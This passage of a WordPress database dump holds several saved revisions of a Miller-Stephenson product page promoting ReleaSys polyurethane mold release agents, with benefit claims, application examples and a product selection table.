style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\n<ul>\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\n</ul>\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\n<ul>\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\n 	<li><span style="font-size: 105%;">Insulation</span></li>\n</ul>\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\n<ul>\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\n</ul>\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\n<table style="height: 284px;" width="769">\n<tbody>\n<tr>\n<td width="105">\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="153">\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="136">\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\n</td>\n<td width="135">\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\n</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2869-autosave-v1', '', '', '2016-11-24 04:11:52', '2016-11-24 04:11:52', '', 2869, 'https://www.miller-stephenson.com/2869-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2875, 3, '2016-11-04 15:57:37', '2016-11-04 15:57:37', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2>Key Application Guide for Polyurethane Mold Release Agents :</h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1>Selection Guide:</h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><strong><span style="color: #0000ff;">Product</span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><strong><span style="color: #0000ff;">Carrier Solvent </span></strong></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><strong><span style="color: #0000ff;">Finish </span></strong></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><strong><span style="color: #0000ff;">Description</span></strong></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Matte</span></td>\r\n<td><span style="font-size: 110%;">• Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Matte</span></td>\r\n<td><span style="font-size: 110%;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Matte - Semigloss</span></td>\r\n<td><span style="font-size: 110%;">• High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;">• High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 15:57:37', '2016-11-04 15:57:37', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2876, 3, '2016-11-04 16:00:06', '2016-11-04 16:00:06', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2>Key Application Guide for Polyurethane Mold Release Agents :</h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><span style="text-decoration: underline;">Selection Guide:</span></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="font-size: 110%;"><strong><span style="color: #0000ff;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="font-size: 110%;"><strong><span style="color: #0000ff;">Carrier Solvent </span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="font-size: 110%;"><strong><span style="color: #0000ff;">Finish </span></strong></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="font-size: 110%;"><strong><span style="color: #0000ff;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Matte</span></td>\r\n<td><span style="font-size: 110%;">• <span style="color: #ed1c24;">Highest Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Matte</span></td>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Matte - Semigloss</span></td>\r\n<td><span style="font-size: 110%;">• <span style="color: #ed1c24;">High Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%; color: #ed1c24;">• High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:00:06', '2016-11-04 16:00:06', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2877, 3, '2016-11-04 16:03:35', '2016-11-04 16:03:35', '<hr />\r\n\r\n<h1>High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> If you’re in a region that has strict VOC regulations and air quality permitting, or if you need products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 110%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong>Application Guide for Polyurethane Mold Release Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 110%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 110%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 110%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 110%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 110%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 110%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 110%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Carrier Solvent </span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Finish </span></strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline;"><span style="font-size: 110%;"><strong><span style="color: #0000ff; text-decoration: underline;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;"><span style="color: #ed1c24;">Highest Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 130%;"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Semigloss</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;"><span style="color: #ed1c24;">High Slip</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #ed1c24;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Polyurethane Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-04 16:03:35', '2016-11-04 16:03:35', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2878, 3, '2016-11-04 16:04:28', '2016-11-04 16:04:28', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 110%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research and development and technical expertise.  Our mold release agents and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 110%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize 